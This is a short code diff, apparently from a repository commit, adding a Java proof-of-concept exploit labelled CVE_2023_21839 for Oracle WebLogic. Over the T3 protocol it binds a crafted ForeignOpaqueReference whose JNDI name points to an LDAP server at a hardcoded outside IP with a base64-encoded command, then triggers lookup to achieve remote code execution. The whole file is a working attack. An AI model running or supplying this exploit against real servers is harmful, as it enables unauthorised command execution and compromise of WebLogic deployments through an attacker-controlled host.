1+ import javax .naming .Context ;
2+ import javax .naming .InitialContext ;
3+ import javax .naming .NamingException ;
4+ import java .lang .reflect .Field ;
5+ import java .util .Hashtable ;
6+ import java .util .Random ;
7+
8+ public class CVE_2023_21839 {
9+ static String JNDI_FACTORY ="weblogic.jndi.WLInitialContextFactory" ;
10+ static String HOW_TO_USE ="[*]exploit start" ;
11+
12+ private static InitialContext getInitialContext (String url )throws NamingException
13+ {
14+ Hashtable <String ,String > env = new Hashtable <String ,String >();
15+ env .put (Context .INITIAL_CONTEXT_FACTORY , JNDI_FACTORY );
16+ env .put (Context .PROVIDER_URL , url );
17+ return new InitialContext (env );
18+ }
19+ public static void main (String args []) throws Exception {
20+ if (args .length <2 ){
21+ System .out .println (HOW_TO_USE );
22+ System .exit (0 );
23+ }
24+ String t3Url = "localhost:7001" ;
25+ String ldapUrl = "ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiBDYWxj" ;
26+ InitialContext c =getInitialContext ("t3://" +t3Url );
27+ Hashtable <String ,String > env = new Hashtable <String ,String >();
28+ env .put (Context .INITIAL_CONTEXT_FACTORY , "com.sun.jndi.rmi.registry.RegistryContextFactory" );
29+ weblogic .deployment .jms .ForeignOpaqueReference f =new weblogic .deployment .jms .ForeignOpaqueReference ();
30+ Field jndiEnvironment =weblogic .deployment .jms .ForeignOpaqueReference .class .getDeclaredField ("jndiEnvironment" );
31+ jndiEnvironment .setAccessible (true );
32+ jndiEnvironment .set (f ,env );
33+ Field remoteJNDIName =weblogic .deployment .jms .ForeignOpaqueReference .class .getDeclaredField ("remoteJNDIName" );
34+ remoteJNDIName .setAccessible (true );
35+ remoteJNDIName .set (f ,ldapUrl );
36+ String bindName = new Random (System .currentTimeMillis ()).nextLong ()+"" ;
37+ try {
38+ c .bind (bindName ,f );
39+ c .lookup (bindName );
40+ }catch (Exception e ){ }
41+
42+ }
43+ }
0 commit comments